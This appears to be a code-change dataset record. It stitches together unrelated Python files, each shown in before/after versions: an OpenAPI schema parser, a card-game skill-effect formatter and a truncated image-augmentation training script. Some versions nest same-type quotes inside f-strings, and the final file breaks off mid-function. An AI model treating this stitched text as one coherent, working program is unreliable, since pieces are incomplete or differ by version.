def get_hypothesis_conversion(self, definitions: List[Dict[str, Any]]) -> Optional[Callable]:
return serialization.serialize_openapi3_parameters(definitions)
def get_common_parameters(methods: Dict[str, Any]) -> List[Dict[str, Any]]:
"""Common parameters are deep copied from the methods definitions.
Copying is needed because of further modifications.
"""
common_parameters = methods.get("parameters")
if common_parameters is not None:
return deepcopy(common_parameters)
return []
def endpoints_to_dict(endpoints: Generator[Endpoint, None, None]) -> Dict[str, CaseInsensitiveDict]:
output: Dict[str, CaseInsensitiveDict] = {}
for endpoint in endpoints:
output.setdefault(endpoint.path, CaseInsensitiveDict())
output[endpoint.path][endpoint.method] = endpoint
return output
def get_schema_from_parameter(data: Dict[str, Any]) -> Dict[str, Any]:
# In Open API 3.0 there could be "schema" or "content" field. They are mutually exclusive
if "schema" in data:
return data["schema"]
options = iter(data["content"].values())
return next(options)["schema"]
| # pylint: disable=too-many-ancestors
import itertools
from copy import deepcopy
from typing import Any, Callable, Dict, Generator, Iterator, List, Optional, Sequence, Tuple
from urllib.parse import urljoin, urlsplit
import jsonschema
from hypothesis.strategies import SearchStrategy
from requests.structures import CaseInsensitiveDict
from ...exceptions import InvalidSchema
from ...hooks import HookContext
from ...models import Case, Endpoint, EndpointDefinition, empty_object
from ...schemas import BaseSchema
from ...stateful import StatefulTest
from ...utils import GenericResponse
from . import links, serialization
from .converter import to_json_schema_recursive
from .examples import get_strategies_from_examples
from .filters import should_skip_by_operation_id, should_skip_by_tag, should_skip_endpoint, should_skip_method
from .references import ConvertingResolver
from .security import BaseSecurityProcessor, OpenAPISecurityProcessor, SwaggerSecurityProcessor
class BaseOpenAPISchema(BaseSchema):
nullable_name: str
links_field: str
operations: Tuple[str, ...]
security: BaseSecurityProcessor
_endpoints_by_operation_id: Dict[str, Endpoint]
@property # pragma: no mutate
def spec_version(self) -> str:
raise NotImplementedError
def get_stateful_tests(
self, response: GenericResponse, endpoint: Endpoint, stateful: Optional[str]
) -> Sequence[StatefulTest]:
if stateful == "links":
return links.get_links(response, endpoint, field=self.links_field)
return []
@property
def base_path(self) -> str:
raise NotImplementedError
def get_full_path(self, path: str) -> str:
"""Compute full path for the given path."""
return urljoin(self.base_path, path.lstrip("/")) # pragma: no mutate
def __repr__(self) -> str:
info = self.raw_schema["info"]
return f"{self.__class__.__name__} for {info['title']} ({info['version']})"
@property
def endpoints(self) -> Dict[str, CaseInsensitiveDict]:
if not hasattr(self, "_endpoints"):
# pylint: disable=attribute-defined-outside-init
endpoints = self.get_all_endpoints()
self._endpoints = endpoints_to_dict(endpoints)
return self._endpoints
def get_all_endpoints(self) -> Generator[Endpoint, None, None]:
try:
paths = self.raw_schema["paths"] # pylint: disable=unsubscriptable-object
context = HookContext()
for path, methods in paths.items():
full_path = self.get_full_path(path)
if should_skip_endpoint(full_path, self.endpoint):
continue
self.dispatch_hook("before_process_path", context, path, methods)
scope, raw_methods = self._resolve_methods(methods)
methods = self.resolver.resolve_all(methods)
common_parameters = get_common_parameters(methods)
for method, resolved_definition in methods.items():
# Only method definitions are parsed
if (
method not in self.operations
or should_skip_method(method, self.method)
or should_skip_by_tag(resolved_definition.get("tags"), self.tag)
or should_skip_by_operation_id(resolved_definition.get("operationId"), self.operation_id)
):
continue
parameters = itertools.chain(resolved_definition.get("parameters", ()), common_parameters)
# To prevent recursion errors we need to pass not resolved schema as well
# It could be used for response validation
raw_definition = EndpointDefinition(raw_methods[method], resolved_definition, scope)
yield self.make_endpoint(full_path, method, parameters, resolved_definition, raw_definition)
except (KeyError, AttributeError, jsonschema.exceptions.RefResolutionError):
raise InvalidSchema("Schema parsing failed. Please check your schema.")
def _resolve_methods(self, methods: Dict[str, Any]) -> Tuple[str, Dict[str, Any]]:
# We need to know a proper scope in what methods are.
# It will allow us to provide a proper reference resolving in `response_schema_conformance` and avoid
# recursion errors
if "$ref" in methods:
return deepcopy(self.resolver.resolve(methods["$ref"]))
return self.resolver.resolution_scope, deepcopy(methods)
def make_endpoint( # pylint: disable=too-many-arguments
self,
full_path: str,
method: str,
parameters: Iterator[Dict[str, Any]],
resolved_definition: Dict[str, Any],
raw_definition: EndpointDefinition,
) -> Endpoint:
"""Create JSON schemas for query, body, etc from Swagger parameters definitions."""
base_url = self.base_url
if base_url is not None:
base_url = base_url.rstrip("/") # pragma: no mutate
endpoint = Endpoint(
path=full_path,
method=method.upper(),
definition=raw_definition,
base_url=base_url,
app=self.app,
schema=self,
)
for parameter in parameters:
self.process_parameter(endpoint, parameter)
self.security.process_definitions(self.raw_schema, endpoint, self.resolver)
return endpoint
def process_parameter(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
"""Convert each Parameter object to a JSON schema."""
parameter = deepcopy(parameter)
parameter = self.resolver.resolve_all(parameter)
self.process_by_type(endpoint, parameter)
def process_by_type(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
raise NotImplementedError
@property
def resolver(self) -> ConvertingResolver:
if not hasattr(self, "_resolver"):
# pylint: disable=attribute-defined-outside-init
self._resolver = ConvertingResolver(self.location or "", self.raw_schema, nullable_name=self.nullable_name)
return self._resolver
def get_content_types(self, endpoint: Endpoint, response: GenericResponse) -> List[str]:
"""Content types available for this endpoint."""
raise NotImplementedError
def get_strategies_from_examples(self, endpoint: Endpoint) -> List[SearchStrategy[Case]]:
"""Get examples from endpoint."""
raise NotImplementedError
def get_response_schema(self, definition: Dict[str, Any], scope: str) -> Tuple[List[str], Optional[Dict[str, Any]]]:
"""Extract response schema from `responses`."""
raise NotImplementedError
def get_endpoint_by_operation_id(self, operation_id: str) -> Endpoint:
"""Get an `Endpoint` instance by its `operationId`."""
if not hasattr(self, "_endpoints_by_operation_id"):
self._endpoints_by_operation_id = dict(self._group_endpoints_by_operation_id())
return self._endpoints_by_operation_id[operation_id]
def _group_endpoints_by_operation_id(self) -> Generator[Tuple[str, Endpoint], None, None]:
for path, methods in self.raw_schema["paths"].items():
full_path = self.get_full_path(path)
scope, raw_methods = self._resolve_methods(methods)
methods = self.resolver.resolve_all(methods)
common_parameters = get_common_parameters(methods)
for method, resolved_definition in methods.items():
if method not in self.operations or "operationId" not in resolved_definition:
continue
parameters = itertools.chain(resolved_definition.get("parameters", ()), common_parameters)
raw_definition = EndpointDefinition(raw_methods[method], resolved_definition, scope)
yield resolved_definition["operationId"], self.make_endpoint(
full_path, method, parameters, resolved_definition, raw_definition
)
def get_endpoint_by_reference(self, reference: str) -> Endpoint:
"""Get local or external `Endpoint` instance by reference.
Reference example: #/paths/~1users~1{user_id}/patch
"""
scope, data = self.resolver.resolve(reference)
path, method = scope.rsplit("/", maxsplit=2)[-2:]
path = path.replace("~1", "/").replace("~0", "~")
full_path = self.get_full_path(path)
resolved_definition = self.resolver.resolve_all(data)
parent_ref, _ = reference.rsplit("/", maxsplit=1)
_, methods = self.resolver.resolve(parent_ref)
common_parameters = get_common_parameters(methods)
parameters = itertools.chain(resolved_definition.get("parameters", ()), common_parameters)
raw_definition = EndpointDefinition(data, resolved_definition, scope)
return self.make_endpoint(full_path, method, parameters, resolved_definition, raw_definition)
class SwaggerV20(BaseOpenAPISchema):
nullable_name = "x-nullable"
example_field = "x-example"
examples_field = "x-examples"
operations: Tuple[str, ...] = ("get", "put", "post", "delete", "options", "head", "patch")
security = SwaggerSecurityProcessor()
links_field = "x-links"
@property
def spec_version(self) -> str:
return self.raw_schema["swagger"]
@property
def verbose_name(self) -> str:
return f"Swagger {self.spec_version}"
@property
def base_path(self) -> str:
"""Base path for the schema."""
path: str = self.raw_schema.get("basePath", "/") # pragma: no mutate
if not path.endswith("/"):
path += "/"
return path
def get_strategies_from_examples(self, endpoint: Endpoint) -> List[SearchStrategy[Case]]:
"""Get examples from endpoint."""
return get_strategies_from_examples(endpoint, self.examples_field)
def process_by_type(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
if parameter["in"] == "path":
self.process_path(endpoint, parameter)
elif parameter["in"] == "query":
self.process_query(endpoint, parameter)
elif parameter["in"] == "header":
self.process_header(endpoint, parameter)
elif parameter["in"] == "body":
# Could be only one parameter with "in=body"
self.process_body(endpoint, parameter)
elif parameter["in"] == "formData":
self.process_form_data(endpoint, parameter)
def process_path(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.path_parameters = self.add_parameter(endpoint.path_parameters, parameter)
def process_header(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.headers = self.add_parameter(endpoint.headers, parameter)
def process_query(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.query = self.add_parameter(endpoint.query, parameter)
def process_body(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
# "schema" is a required field
endpoint.body = parameter["schema"]
def process_form_data(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.form_data = self.add_parameter(endpoint.form_data, parameter)
def add_parameter(self, container: Optional[Dict[str, Any]], parameter: Dict[str, Any]) -> Dict[str, Any]:
"""Add parameter object to the container."""
name = parameter["name"]
container = container or empty_object()
container["properties"][name] = self.parameter_to_json_schema(parameter)
if parameter.get("required", False):
container["required"].append(name)
return self.add_examples(container, parameter)
def add_examples(self, container: Dict[str, Any], parameter: Dict[str, Any]) -> Dict[str, Any]:
if self.example_field in parameter:
examples = container.setdefault("example", {}) # examples should be merged together
examples[parameter["name"]] = parameter[self.example_field]
return container
def parameter_to_json_schema(self, data: Dict[str, Any]) -> Dict[str, Any]:
"""Convert Parameter object to a JSON schema."""
return {
key: value
for key, value in data.items()
# Do not include keys not supported by JSON schema
if not (key == "required" and not isinstance(value, list))
}
def get_response_schema(self, definition: Dict[str, Any], scope: str) -> Tuple[List[str], Optional[Dict[str, Any]]]:
scopes, definition = self.resolver.resolve_in_scope(deepcopy(definition), scope)
schema = definition.get("schema")
if not schema:
return scopes, None
# Extra conversion to JSON Schema is needed here if there was one $ref in the input
# because it is not converted
return scopes, to_json_schema_recursive(schema, self.nullable_name)
def get_content_types(self, endpoint: Endpoint, response: GenericResponse) -> List[str]:
produces = endpoint.definition.raw.get("produces", None)
if produces:
return produces
return self.raw_schema.get("produces", [])
def get_hypothesis_conversion(self, definitions: List[Dict[str, Any]]) -> Optional[Callable]:
return serialization.serialize_swagger2_parameters(definitions)
class OpenApi30(SwaggerV20): # pylint: disable=too-many-ancestors
nullable_name = "nullable"
example_field = "example"
examples_field = "examples"
operations = SwaggerV20.operations + ("trace",)
security = OpenAPISecurityProcessor()
links_field = "links"
@property
def spec_version(self) -> str:
return self.raw_schema["openapi"]
@property
def verbose_name(self) -> str:
return f"Open API {self.spec_version}"
@property
def base_path(self) -> str:
"""Base path for the schema."""
servers = self.raw_schema.get("servers", [])
if servers:
# assume we're the first server in list
server = servers[0]
url = server["url"].format(**{k: v["default"] for k, v in server.get("variables", {}).items()})
path = urlsplit(url).path
else:
path = "/"
if not path.endswith("/"):
path += "/"
return path
def make_endpoint( # pylint: disable=too-many-arguments
self,
full_path: str,
method: str,
parameters: Iterator[Dict[str, Any]],
resolved_definition: Dict[str, Any],
raw_definition: EndpointDefinition,
) -> Endpoint:
"""Create JSON schemas for query, body, etc from Swagger parameters definitions."""
endpoint = super().make_endpoint(full_path, method, parameters, resolved_definition, raw_definition)
if "requestBody" in resolved_definition:
self.process_body(endpoint, resolved_definition["requestBody"])
return endpoint
def process_by_type(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
if parameter["in"] == "cookie":
self.process_cookie(endpoint, parameter)
else:
super().process_by_type(endpoint, parameter)
def add_examples(self, container: Dict[str, Any], parameter: Dict[str, Any]) -> Dict[str, Any]:
schema = get_schema_from_parameter(parameter)
if self.example_field in schema:
examples = container.setdefault("example", {}) # examples should be merged together
examples[parameter["name"]] = schema[self.example_field]
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.2.md#parameter-object
# > Furthermore, if referencing a schema which contains an example,
# > the example value SHALL override the example provided by the schema
return super().add_examples(container, parameter)
def process_cookie(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.cookies = self.add_parameter(endpoint.cookies, parameter)
def process_body(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
# Take the first media type object
options = iter(parameter["content"].values())
parameter = next(options)
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.2.md#media-type-object
# > Furthermore, if referencing a schema which contains an example,
# > the example value SHALL override the example provided by the schema
if "example" in parameter:
schema = get_schema_from_parameter(parameter)
schema["example"] = parameter["example"]
super().process_body(endpoint, parameter)
def parameter_to_json_schema(self, data: Dict[str, Any]) -> Dict[str, Any]:
schema = get_schema_from_parameter(data)
return super().parameter_to_json_schema(schema)
def get_response_schema(self, definition: Dict[str, Any], scope: str) -> Tuple[List[str], Optional[Dict[str, Any]]]:
scopes, definition = self.resolver.resolve_in_scope(deepcopy(definition), scope)
options = iter(definition.get("content", {}).values())
option = next(options, None)
if option:
# Extra conversion to JSON Schema is needed here if there was one $ref in the input
# because it is not converted
return scopes, to_json_schema_recursive(option["schema"], self.nullable_name)
return scopes, None
def get_strategies_from_examples(self, endpoint: Endpoint) -> List[SearchStrategy[Case]]:
"""Get examples from endpoint."""
return get_strategies_from_examples(endpoint, self.examples_field)
def get_content_types(self, endpoint: Endpoint, response: GenericResponse) -> List[str]:
try:
responses = endpoint.definition.raw["responses"]
except KeyError:
# Possible to get if `validate_schema=False` is passed during schema creation
raise InvalidSchema("Schema parsing failed. Please check your schema.")
definitions = responses.get(str(response.status_code), {}).get("content", {})
return list(definitions.keys())
def get_hypothesis_conversion(self, definitions: List[Dict[str, Any]]) -> Optional[Callable]:
return serialization.serialize_openapi3_parameters(definitions)
def get_common_parameters(methods: Dict[str, Any]) -> List[Dict[str, Any]]:
"""Common parameters are deep copied from the methods definitions.
Copying is needed because of further modifications.
"""
common_parameters = methods.get("parameters")
if common_parameters is not None:
return deepcopy(common_parameters)
return []
def endpoints_to_dict(endpoints: Generator[Endpoint, None, None]) -> Dict[str, CaseInsensitiveDict]:
output: Dict[str, CaseInsensitiveDict] = {}
for endpoint in endpoints:
output.setdefault(endpoint.path, CaseInsensitiveDict())
output[endpoint.path][endpoint.method] = endpoint
return output
def get_schema_from_parameter(data: Dict[str, Any]) -> Dict[str, Any]:
# In Open API 3.0 there could be "schema" or "content" field. They are mutually exclusive
if "schema" in data:
return data["schema"]
options = iter(data["content"].values())
return next(options)["schema"]
|
from .dataclasses import Skill, Card
from .string_mgr import DictionaryAccess
from typing import Callable, Union, Optional
from collections import UserDict
from .skill_cs_enums import (
ST,
IMPLICIT_TARGET_SKILL_TYPES,
PERCENT_VALUE_SKILL_TYPES,
MIXED_VALUE_SKILL_TYPES,
)
VALUE_PERCENT = 1
VALUE_MIXED = 2
class SkillEffectDSLHelper(UserDict):
def __call__(self, skill_type_id):
def _(describer):
self.data[skill_type_id] = describer
return describer
return _
class SkillEffectDescriberContext(object):
def __init__(self):
self.finish = self.default_finish
self.birdseye = self.default_birdseye
self.trigger = self.default_trigger
self.target = self.default_target
self.combiner = self.default_combiner
self.skill_effect = SkillEffectDSLHelper()
@staticmethod
def mod_value(vs):
eff_d_type = 1
if vs.effect_type in MIXED_VALUE_SKILL_TYPES:
eff_d_type = vs.calc_type
elif vs.effect_type in PERCENT_VALUE_SKILL_TYPES:
eff_d_type = 2
if eff_d_type > 1:
vf = vs.effect_value / 100
vi = vs.effect_value // 100
if vf == vi:
vf = vi
return f"{vf}%"
return str(vs.effect_value)
def default_birdseye(self, effect1, effect2=None):
return ""
def default_finish(self, skill: Skill.Effect):
return ""
def default_trigger(self, skill: Skill):
return ""
def default_target(self, tt: Skill.TargetType, strings: DictionaryAccess, context: Card):
return ""
def default_combiner(self, trigger: str, effect: str):
return " ".join([trigger, effect])
def finish_clause(self, f: Callable[[Skill.Effect, dict], str]):
self.finish = f
return f
def birdseye_clause(self, f: Callable[[tuple, Optional[tuple]], str]):
self.birdseye = f
return f
def trigger_clause(self, f: Callable[[Skill, dict], str]):
self.trigger = f
return f
def target_clause(self, f: Callable[[Skill.TargetType, Card], str]):
self.target = f
return f
def final_combiner(self, f: Callable[[str, str], str]):
self.combiner = f
return f
def format_single_value(self, level_struct):
return self.mod_value(level_struct)
def format_target(
self,
tt: Skill,
strings: DictionaryAccess,
context: Card = None,
format_args: dict = None,
format_args_sec: dict = None
):
if format_args is None:
format_args = {"var": "", "let": "", "end": ""}
if format_args_sec is None:
format_args_sec = format_args
e1 = None
e2 = None
if tt.levels[0].effect_type not in IMPLICIT_TARGET_SKILL_TYPES:
e1 = self.target(tt.target, strings, context)
if (tt.levels_2 and tt.levels_2[0].effect_type not in IMPLICIT_TARGET_SKILL_TYPES
and tt.target_2.id != tt.target.id):
e2 = self.target(tt.target_2, strings, context)
if e1 and e2:
return self.display_dual_effect(e1, e2, format_args=format_args, format_args_sec=format_args_sec)
elif e1:
return e1
elif e2:
return e2
return ""
def find_formatter(self, effect_type):
desc = self.skill_effect.get(effect_type)
if not desc:
return None
if callable(desc):
return desc
return desc.format
def display_value(self, levels, at_level):
if at_level is not None:
value = self.birdseye(levels[at_level])
else:
value = self.birdseye(levels[0], levels[-1])
return value
def display_dual_effect(
self,
effect_1: str,
effect_2: str,
format_args: dict,
format_args_sec: dict
):
return (
f"{format_args["let"]}①{format_args["end"]} {effect_1} "
f"{format_args_sec["let"]}②{format_args_sec["end"]} {effect_2}"
)
def format_effect(
self,
skill: Skill,
level: int = None,
format_args: dict = None,
format_args_sec: dict = None,
):
if format_args is None:
format_args = {"var": "", "let": "", "end": ""}
if format_args_sec is None:
format_args_sec = format_args
formatter = self.find_formatter(skill.levels[0].effect_type)
if skill.levels_2:
formatter_sec = self.find_formatter(skill.levels_2[0].effect_type)
else:
formatter_sec = None
if formatter is None or (skill.levels_2 and formatter_sec is None):
return None
if len(skill.levels) == 1:
level = 0
value = self.display_value(skill.levels, level)
trigger = self.trigger(skill, format_args)
effect = " ".join(
(formatter(value=value, **format_args), self.finish(skill.levels[0], format_args))
)
if skill.levels_2:
value_2 = self.display_value(skill.levels_2, level)
effect_2 = " ".join(
(
formatter_sec(value=value_2, **format_args_sec),
self.finish(skill.levels_2[0], format_args_sec),
)
)
effect = self.display_dual_effect(effect, effect_2, format_args, format_args_sec)
return self.combiner(trigger, effect)
| from .dataclasses import Skill, Card
from .string_mgr import DictionaryAccess
from typing import Callable, Union, Optional
from collections import UserDict
from .skill_cs_enums import (
ST,
IMPLICIT_TARGET_SKILL_TYPES,
PERCENT_VALUE_SKILL_TYPES,
MIXED_VALUE_SKILL_TYPES,
)
VALUE_PERCENT = 1
VALUE_MIXED = 2
class SkillEffectDSLHelper(UserDict):
def __call__(self, skill_type_id):
def _(describer):
self.data[skill_type_id] = describer
return describer
return _
class SkillEffectDescriberContext(object):
def __init__(self):
self.finish = self.default_finish
self.birdseye = self.default_birdseye
self.trigger = self.default_trigger
self.target = self.default_target
self.combiner = self.default_combiner
self.skill_effect = SkillEffectDSLHelper()
@staticmethod
def mod_value(vs):
eff_d_type = 1
if vs.effect_type in MIXED_VALUE_SKILL_TYPES:
eff_d_type = vs.calc_type
elif vs.effect_type in PERCENT_VALUE_SKILL_TYPES:
eff_d_type = 2
if eff_d_type > 1:
vf = vs.effect_value / 100
vi = vs.effect_value // 100
if vf == vi:
vf = vi
return f"{vf}%"
return str(vs.effect_value)
def default_birdseye(self, effect1, effect2=None):
return ""
def default_finish(self, skill: Skill.Effect):
return ""
def default_trigger(self, skill: Skill):
return ""
def default_target(self, tt: Skill.TargetType, strings: DictionaryAccess, context: Card):
return ""
def default_combiner(self, trigger: str, effect: str):
return " ".join([trigger, effect])
def finish_clause(self, f: Callable[[Skill.Effect, dict], str]):
self.finish = f
return f
def birdseye_clause(self, f: Callable[[tuple, Optional[tuple]], str]):
self.birdseye = f
return f
def trigger_clause(self, f: Callable[[Skill, dict], str]):
self.trigger = f
return f
def target_clause(self, f: Callable[[Skill.TargetType, Card], str]):
self.target = f
return f
def final_combiner(self, f: Callable[[str, str], str]):
self.combiner = f
return f
def format_single_value(self, level_struct):
return self.mod_value(level_struct)
def format_target(
self,
tt: Skill,
strings: DictionaryAccess,
context: Card = None,
format_args: dict = None,
format_args_sec: dict = None
):
if format_args is None:
format_args = {"var": "", "let": "", "end": ""}
if format_args_sec is None:
format_args_sec = format_args
e1 = None
e2 = None
if tt.levels[0].effect_type not in IMPLICIT_TARGET_SKILL_TYPES:
e1 = self.target(tt.target, strings, context)
if (tt.levels_2 and tt.levels_2[0].effect_type not in IMPLICIT_TARGET_SKILL_TYPES
and tt.target_2.id != tt.target.id):
e2 = self.target(tt.target_2, strings, context)
if e1 and e2:
return self.display_dual_effect(e1, e2, format_args=format_args, format_args_sec=format_args_sec)
elif e1:
return e1
elif e2:
return e2
return ""
def find_formatter(self, effect_type):
desc = self.skill_effect.get(effect_type)
if not desc:
return None
if callable(desc):
return desc
return desc.format
def display_value(self, levels, at_level):
if at_level is not None:
value = self.birdseye(levels[at_level])
else:
value = self.birdseye(levels[0], levels[-1])
return value
def display_dual_effect(
self,
effect_1: str,
effect_2: str,
format_args: dict,
format_args_sec: dict
):
return (
f"{format_args['let']}①{format_args['end']} {effect_1} "
f"{format_args_sec['let']}②{format_args_sec['end']} {effect_2}"
)
def format_effect(
self,
skill: Skill,
level: int = None,
format_args: dict = None,
format_args_sec: dict = None,
):
if format_args is None:
format_args = {"var": "", "let": "", "end": ""}
if format_args_sec is None:
format_args_sec = format_args
formatter = self.find_formatter(skill.levels[0].effect_type)
if skill.levels_2:
formatter_sec = self.find_formatter(skill.levels_2[0].effect_type)
else:
formatter_sec = None
if formatter is None or (skill.levels_2 and formatter_sec is None):
return None
if len(skill.levels) == 1:
level = 0
value = self.display_value(skill.levels, level)
trigger = self.trigger(skill, format_args)
effect = " ".join(
(formatter(value=value, **format_args), self.finish(skill.levels[0], format_args))
)
if skill.levels_2:
value_2 = self.display_value(skill.levels_2, level)
effect_2 = " ".join(
(
formatter_sec(value=value_2, **format_args_sec),
self.finish(skill.levels_2[0], format_args_sec),
)
)
effect = self.display_dual_effect(effect, effect_2, format_args, format_args_sec)
return self.combiner(trigger, effect)
|
import pathlib
import sys
sys.path.append(str(pathlib.Path(__file__).parent.parent.absolute()))
import itertools
import json
import logging
import math
import os
from collections import OrderedDict
import torch
from torch.distributions import Categorical
from torch import nn, optim
from torch.nn.parallel.data_parallel import DataParallel
from torch.nn.parallel import DistributedDataParallel
import torch.distributed as dist
from torchvision import transforms
from tqdm import tqdm
from theconf import Config as C, ConfigArgumentParser
from AdapAug.common import get_logger, EMA, add_filehandler
from AdapAug.data import get_dataloaders, Augmentation, CutoutDefault
from AdapAug.lr_scheduler import adjust_learning_rate_resnet
from AdapAug.metrics import accuracy, Accumulator, CrossEntropyLabelSmooth, Tracker
from AdapAug.networks import get_model, num_class
from AdapAug.tf_port.rmsprop import RMSpropTF
from AdapAug.aug_mixup import CrossEntropyMixUpLabelSmooth, mixup
from warmup_scheduler import GradualWarmupScheduler
import random, copy, numpy as np
logger = get_logger('Fast AutoAugment')
logger.setLevel(logging.INFO)
_CIFAR_MEAN, _CIFAR_STD = (0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)
def run_epoch(model, loader, loss_fn, optimizer, desc_default='', epoch=0, writer=None, verbose=1, scheduler=None, is_master=True, ema=None, wd=0.0, tqdm_disabled=False, \
data_parallel=False, trace=False, batch_multiplier=1, get_trace=[]):
if data_parallel:
model = DataParallel(model).cuda()
if verbose:
loader = tqdm(loader, disable=tqdm_disabled)
loader.set_description('[%s %04d/%04d]' % (desc_default, epoch, C.get()['epoch']))
params_without_bn = [params for name, params in model.named_parameters() if not ('_bn' in name or '.bn' in name)]
loss_ema = None
metrics = Accumulator()
if trace or batch_multiplier > 1:
tracker = Tracker()
cnt = 0
total_steps = len(loader)
steps = 0
for data, label in loader:
steps += 1
if isinstance(data, list):
data, clean_data, log_prob, policy = data
if batch_multiplier > 1:
log_prob = torch.cat([ log_prob[:,m] for m in range(batch_multiplier) ]) # [batch, M] -> [batch*M]
policy = torch.cat([ policy[:,m] for m in range(batch_multiplier) ]) # [batch, M, n_subpolicy, n_op, 3] -> [batch*M, n_subpolicy, n_op, 3]
clean_label = label.detach()
if batch_multiplier > 1:
data = torch.cat([ data[:,m] for m in range(batch_multiplier) ])
label = label.repeat(batch_multiplier)
data, label = data.cuda(), label.cuda()
if C.get().conf.get('mixup', 0.0) <= 0.0 or optimizer is None:
preds = model(data)
loss = loss_fn(preds, label)
else: # mixup
data, targets, shuffled_targets, lam = mixup(data, label, C.get()['mixup'])
preds = model(data)
loss = loss_fn(preds, targets, shuffled_targets, lam)
del shuffled_targets, lam
if 'clean_loss' in get_trace or 'clean_logits' in get_trace:
with torch.no_grad():
clean_logits = model(clean_data.cuda())
if 'clean_loss' in get_trace:
clean_loss = loss_fn(clean_logits, clean_label.cuda()).cpu().detach()
if trace or batch_multiplier > 1:
_loss = loss.cpu().detach()
loss = loss.mean()
if optimizer:
loss += wd * (1. / 2.) * sum([torch.sum(p ** 2) for p in params_without_bn])
loss.backward()
grad_clip = C.get()['optimizer'].get('clip', 5.0)
if grad_clip > 0:
nn.utils.clip_grad_norm_(model.parameters(), grad_clip)
optimizer.step()
optimizer.zero_grad()
if ema is not None:
ema(model, (epoch - 1) * total_steps + steps)
top1, top5 = accuracy(preds, label, (1, 5))
metrics.add_dict({
'loss': loss.item() * len(data),
'top1': top1.item() * len(data),
'top5': top5.item() * len(data),
})
cnt += len(data)
if trace:
tracker.add_dict({
'cnt': len(data),
'clean_data': (clean_data.cpu().detach(), clean_label.cpu()),
'log_probs': log_prob.cpu().detach(),
'policy': policy.cpu().detach(),
'loss': _loss,
'acc': top1.item(),
})
del log_prob, policy, _loss, clean_data, clean_label
if 'clean_loss' in get_trace:
tracker.add('clean_loss', clean_loss)
del clean_loss
if 'logits' in get_trace:
tracker.add('logits', preds.cpu().detach())
if 'clean_logits' in get_trace:
tracker.add('clean_logits', clean_logits.cpu().detach())
elif batch_multiplier > 1:
tracker.add_dict({
'cnt': len(data),
'loss': _loss,
# 'acc': top1.item(),
})
del _loss
if loss_ema:
loss_ema = loss_ema * 0.9 + loss.item() * 0.1
else:
loss_ema = loss.item()
if verbose:
postfix = metrics / cnt
if optimizer:
postfix['lr'] = optimizer.param_groups[0]['lr']
postfix['loss_ema'] = loss_ema
loader.set_postfix(postfix)
if scheduler is not None:
scheduler.step(epoch - 1 + float(steps) / total_steps)
del preds, loss, top1, top5, data, label
if tqdm_disabled and verbose:
if optimizer:
logger.info('[%s %03d/%03d] %s lr=%.6f', desc_default, epoch, C.get()['epoch'], metrics / cnt, optimizer.param_groups[0]['lr'])
else:
logger.info('[%s %03d/%03d] %s', desc_default, epoch, C.get()['epoch'], metrics / cnt)
metrics /= cnt
if optimizer:
metrics.metrics['lr'] = optimizer.param_groups[0]['lr']
if verbose:
for key, value in metrics.items():
writer.add_scalar(key, value, epoch)
if trace or batch_multiplier > 1:
return tracker, metrics
return metrics
def train_and_eval(tag, dataloaders, dataroot, test_ratio=0.0, cv_fold=0, reporter=None, metric='last', save_path=None, only_eval=False, local_rank=-1, evaluation_interval=5, reduced=False, gr_assign=None, gr_dist=None, data_parallel=False):
total_batch = C.get()["batch"]
if test_ratio == 0. and 'test_dataset' in C.get().conf:
dataset = C.get()['test_dataset']
else:
dataset = C.get()["dataset"]
if dataloaders:
trainsampler, trainloader, validloader, testloader_ = dataloaders
else:
if gr_dist is not None:
m = Categorical(gr_dist)
gr_ids = m.sample().numpy()
else:
gr_ids = None
trainsampler, trainloader, validloader, testloader_ = get_dataloaders(dataset, C.get()['batch'], dataroot, test_ratio, split_idx=cv_fold, multinode=(local_rank >= 0), gr_assign=gr_assign, gr_ids=gr_ids)
if local_rank >= 0:
dist.init_process_group(backend='nccl', init_method='env://', world_size=int(os.environ['WORLD_SIZE']))
device = torch.device('cuda', local_rank)
torch.cuda.set_device(device)
C.get()['lr'] *= dist.get_world_size()
logger.info(f'local batch={C.get()['batch']} world_size={dist.get_world_size()} ----> total batch={C.get()['batch'] * dist.get_world_size()}')
total_batch = C.get()["batch"] * dist.get_world_size()
is_master = local_rank < 0 or dist.get_rank() == 0
if is_master:
add_filehandler(logger, save_path + '.log')
if not reporter:
reporter = lambda **kwargs: 0
max_epoch = C.get()['epoch']
# create a model & an optimizer
model = get_model(C.get()['model'], num_class(dataset), local_rank=local_rank)
model_ema = get_model(C.get()['model'], num_class(dataset), local_rank=-1)
model_ema.eval()
criterion_ce = criterion = CrossEntropyLabelSmooth(num_class(dataset), C.get().conf.get('lb_smooth', 0))
if C.get().conf.get('mixup', 0.0) > 0.0:
criterion = CrossEntropyMixUpLabelSmooth(num_class(dataset), C.get().conf.get('lb_smooth', 0))
if C.get()['optimizer']['type'] == 'sgd':
optimizer = optim.SGD(
model.parameters(),
lr=C.get()['lr'],
momentum=C.get()['optimizer'].get('momentum', 0.9),
weight_decay=0.0,
nesterov=C.get()['optimizer'].get('nesterov', True)
)
elif C.get()['optimizer']['type'] == 'rmsprop':
optimizer = RMSpropTF(
model.parameters(),
lr=C.get()['lr'],
weight_decay=0.0,
alpha=0.9, momentum=0.9,
eps=0.001
)
else:
raise ValueError('invalid optimizer type=%s' % C.get()['optimizer']['type'])
lr_scheduler_type = C.get()['lr_schedule'].get('type', 'cosine')
if lr_scheduler_type == 'cosine':
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=C.get()['epoch'], eta_min=0.)
elif lr_scheduler_type == 'resnet':
scheduler = adjust_learning_rate_resnet(optimizer)
elif lr_scheduler_type == 'efficientnet':
